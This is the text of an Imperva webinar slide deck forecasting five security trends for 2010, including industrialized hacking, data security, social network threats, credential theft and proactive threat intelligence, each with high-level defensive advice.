Top 5 Security Trends for 2010
Noa Bar-Yosef, Security Research Engineer, Imperva
Imperva Background
 Focuses on Application Data Security and Compliance
 Application Defense Center (ADC)
+ Research organization headed by Amichai Shulman
+ Security analysis
+ Vulnerability discovery
+ Compliance expertise
+ Threat research
+ Education
MS
Agenda
 Scorecard for 2009 Security Trends
 2010 Top Security Trends
+ Emerging threats, vendor security notification policies, and new
security tactics
+ Strategies to mitigate today’s security threats
 Q&A
BC
Scorecard for 2009 Security Trends
Trend
Score
1
Disclosure becoming irresponsible
A-
2
Economics to affect threat level
A
3
Surge of cloud related threats
C
4
Evolution of automated attacks
A+
5
Increased threat business
applications (e.g. SAP)
C
6
Proliferation of CSRF
D
#1 - The Industrialization of Hacking
 Hacking is becoming a profitable industry
 The foundations of any industry can be
identified within hacking
+ Building layered roles (supply chain)
+ Horizontal expertise
+ Resource optimization
+ Automation
 Individual or political hacking haven’t
ceased; but they have become a secondary
threat
The Industrialization of Hacking
Layered Roles
 Detect vulnerabilities and develop
exploits
+ Hardcore “hackers” with strong technical
capabilities
+ Keep clean of actual targets
+ Provide the building blocks for others
 Grow botnets
+ Groups devoted to controlling as many
zombies as possible
+ Complex operations (will discuss later)
+ Provide zombies from the botnet for use
by perpetrators
The Industrialization of Hacking
Layered Roles (cont.)
 Exploit targets
+ Groups that make use of zombies for various purposes
+ Send spam
+ Collect data
+ Inflict DoS
 Consumers
+ Monetize information
– Credit card fraud
– Identity theft
+ Advertize through spam
+ Blackmail
The Industrialization of Hacking
Resource Optimization
 “Nothing is thrown to the garbage”
 Each workstation or application, once
compromised, is exploited in one way or
another as part of the industrial food chain
 Compromised Applications
+ Direct value (fund transfer, credit card information,
+
+
+
+
etc.)
Indirect value (credentials to other systems)
Malware distribution
Blackhat SEO
Command & Control
The Industrialization of Hacking
Resource Optimization (cont.)
 Workstations
+ Keylogger for grabbing credentials
+ Specialized malware for man-in-the-browser attacks
+ General purpose Trojan to use as part of a botnet
+ Relay into internal networks
The Industrialization of Hacking
Automation
 Core of the industrial process – growing botnets and
exploiting targets – is mostly automated
 Selecting target applications through search engines
 Compromise applications using captured zombies
+ Configuration and commands distributed through forums and web
pages
 Sometimes the compromise is
through search engine abuse
The Industrialization of Hacking
Automation (cont.)
 Templates and kits exist for everything
+ Remote file include
+ Phishing of various applications
+ Botnet client (ASPROX, Zeus, Clampi, etc.)
 Looking at the numbers from attack campaigns
clearly shows the power of automation
+ Last month we have heard of 132K sites
compromised in one campaign
+ We have tracked a similar campaign 3 weeks prior
and saw the same flaw exploited in the same way
over hundreds of sites
 Techniques are becoming more sophisticated
+ Randomized DNS in order to avoid C&C hijacking
The Industrialization of Hacking
Our Advice
 We are no longer fighting the script kiddies or sporadic
hacking attempts – we are fighting Hackers Inc.
 Cannot hide from the problem.
+ Small and large applications alike
+ Servers or workstations
+ It’s not personal.
 Smaller organizations
+ Must start paying attention to application security
+ Either directly or through their hosting providers
 Organizations must look for tools to help them detect and
mitigate automation properly
#2 – From Application Security to Data Security
 The 90s’ were all about network related security problems
(connecting enterprise networks to the Internet) and network
security solutions (Network Firewall)
 Throughout this decade we’ve seen a shift of activity towards
web application attacks
+ Network security becomes commodity and network attacks are
harder to execute
+ At the turn of the century eCommerce and online services took a
steep climb. Attacker motivation increases as applications expose
more information and more functionality.
+ It is far easier to access data through applications designed to
manipulate it
From application security to data security
Web Application Security is No Longer Enough
 Internal threat still prominent
 Many internal applications are not web based
 Web application security can be effectively applied to major
internal applications but not all of them
 Many time internal users have (authorized) direct access to
the database
 Once data from application flows into a workstation its on the
loose
 Regulations require that specific types of data be tracked
From applications security to data security
Continuous Data Security
 Track access to sensitive and regulated data throughout its
lifecycle
 Basic information lifecycle
+ Most sensitive and regulated data can be traced back to structured
storage (SQL databases)
+ Sensitive information may be transformed into unstructured format
and placed in document storage and management system (File
shares, MS Sharepoint, EMC Documentum)
+ Data is processed in workstations and may leave the enterprise
boundaries through email, WebMail, file transfer and physical media
From applications security to data security
Our Advice
 Controls around individual data repositories
+ Database access monitoring
+ File activity monitoring
 Controls to track data in process
+ Next generation of DLP products
+ Integrate with DRM
 Collaboration between data security products
+ Policies expressed in terms of information type based on content,
rather than table and file names
+ Track specific pieces of information as they leave the database, flow
through web applications, transformed into files and flow through
outgoing channels.
#3 – Social networks expose larger societies
 Past: Specific parts of the population
+ Young adults of the Internet generation
 Today / Future: Everyone and their
dog have a Facebook account
+ Younger, immature audience
– Kids making their first steps into the virtual
society
+ Conservative adult community
– People who otherwise have very conservative
web access behavior
+ Senior community
– People whose trust models are deeply rooted
in the old world (my grandmother)
Social networks expose larger societies
Pandemic Threats
 There are three distinctive pillars to social
networks that make them a perfect fit for
online pandemic threats:
+ Huge crowds
+ Inherently expose personal information
+ Built-in mechanisms for implicit and explicit trust
generation between loosely coupled individuals
 Attackers can push their “merchandise” to larger
unsuspecting crowds with higher than ever success rates
+ Use the implicit trust
+ Abuses the abundance of personal information to create more trust
Social networks expose larger societies
The Evolution of an Octopus
 Social networks are becoming social platforms
+ Integrating MMORPG (e.g. Farmville), 3rd party apps
+ More opportunities for trust abuse
– ClickJacking through Farmville gifts
+ Less control over the robustness of integrated applications
 Integrating social networks into other domains
+ Google, Bing and Yahoo! integrating Twitter and Facebook results
+ Promoting malware just became
much easier!
To install the application, please follow this link:
here
Social networks expose larger societies
The Evolution of an Octopus
Best regards,
Douglas
 Integrating social networks into enterprise
+ HR systems, CRM systems
+ Creating a Mobius strip of information, mixing
internal and external trust
Dear John,
We'd like your help to spread the word about our open jobs. If you follow the link
below and install this application on your Facebook profile page, your friends will
be able to see, apply and forward our jobs. The best part is that if your friend, or a
friend of a friend, applies for a job and is hired, you will automatically get credit for
the employee referral through Jobvite. You will be eligible for the referral bonus.
To install the application, please follow this link:
here
Best regards,
Sue
Social networks expose larger societies
Our Advice - Redefining Trust
 Social networks are all about novelty
+ We can expect them to rush new features out at the expense of
security
+ As more 3rd party apps are created we cannot expect those to
consider any security at all
 We need tools to help us evaluate trust in huge, dynamic,
virtual societies
+ These are starting to show up as research projects or initial offering
from various vendors
 Security tools and policies should be able to build on these
trust systems
#4 – Credentials are the New Credit Card Numbers
 Dramatic surge in the number of data compromise incidents
+ Credit card numbers
+ Personal details
 Price levels per single stolen record are constantly dropping
+ Attackers are looking for more profitable targets
 We clearly see an increased level of activity around hacking
user credentials for online applications
Application credentials are the new CCNs
Motivation
 Credit card numbers are harder to monetize
+ Need to purchase goods and cash those out
 Personal details are even harder to monetize
+ Cannot be used in masses
+ Require additional fraud (involving identity theft)
 The premise of application credentials
+ Easier to monetize
+ Higher value per record
Application credentials are the new CCNs
Motivation (cont.)
 Financial applications
+ Can be easily converted into hard cash through online transactions
(fund transfers, stock trading, etc.)
 Enterprise in the cloud (SalesForce.com, GoogleDocs, etc.)
+ Access to sensitive commercial information
+ Can be traded for money, used for fraudulent transactions and even
blackmail
 Web mail
+ Direct access to personal details
+ Further access to the above mentioned applications
+ SPAM
Application credentials are the new CCNs
Tools of the Trade
 Keyloggers
+ Cleartext passwords
+ Once a computer is infected quality data is flowing in
+ Requires massive infected botnets
 Phishing attacks
+ Cleartext passwords
+ Low quality data
+ Low success rates
 Application compromise (e.g. SQL injection)
+ Sometimes digested password that need further cracking
+ High quality data
+ Huge numbers
Application credentials are the new CCNs
Our Advice
 Protect you web facing applications
+ Defeat attacks
 Store digested passwords
+ Defeat exposure in case of compromise
 Use safe password recovery procedures
+ Avoid automatic leveraging of another compromise
 Include two factor authentication
+ When possible
#5 – Proactive Security
 To date the security concept has been largely reactive
+ Wait for a vulnerability to be disclosed
+ Create a signature (or some other security rule)
+ Cross reference requests against these attack methods, regardless of
their context in time or source
 As a consequence security decisions are becoming more
difficult and resource consumption (machine as well as
human) is growing
+ Distinguishing “bad” requests from “good” requests based on request
content alone becomes more difficult and more time consuming
+ Not only machine resources but also human resources as more
decisions cannot be taken automatically
+ This is completely inadequate in world of growing attack rates
Proactive security
Tired of Being a Sitting Duck?
 Rather than waiting to be attacked, security research teams
start to proactively look for attacker activity as it is being
initialised over the network
 Traditionally used for longer term research, proactive
intelligence operations can be used for immediate security
value:
+ Identify compromised computers being actively exploited to launch
attacks
+ Quickly identify attack campaigns at their early stages
+ Discover 0 day vulnerabilities in the wild rather than in the lab
+ Identify targets of upcoming attacks in advance
Proactive security
Military Intelligence is a Contradiction in Terms*
 There are different techniques for gathering timely
intelligence
+ Some techniques, especially related to the SPAM domain have
already been in use for a couple of years
 Some technique are based on a network of sensors. Three
basic types of sensors
+ Setting up targets for attacks (fake web applications, mailboxes to
receive spam, etc.)
+ Setting up communication channels for use by attackers (anonymous
proxies, TOR relays)
+ Network sniffers in strategic locations
+ Tap into C&C servers
*Groucho Marx
Proactive security
Military Intelligence (cont.)
 Other techniques are more laborious
+ Reverse engineering of new malware to identify C&C servers
+ Hijack domain names intended for use by botnets
+ Tap into hacker discussions in forums and
 Existing projects and commercial offerings for various types of
threats (sample):
+ Dshield (General reputation for IPs)
+ ShadowServer (Botnet oriented)
+ Cyveillance (Phishing and compromised servers)
+ Project Honeypot (Spam related)
Proactive security
Our Advice
 Engaging in proactive security requires
substantial research resources – don’t expect
to do it yourself
 Some solutions (mainly around endpoint
security) are incorporating data obtained
through proactive security
 Next generation of enterprise solutions will
include integration of data obtained from
proactive security projects and providers
 Add proactive security to your wish list when
looking at enterprise solutions
Security Trends that just missed the Top 5
Questions & Answers
ADC Data Security Webinar Series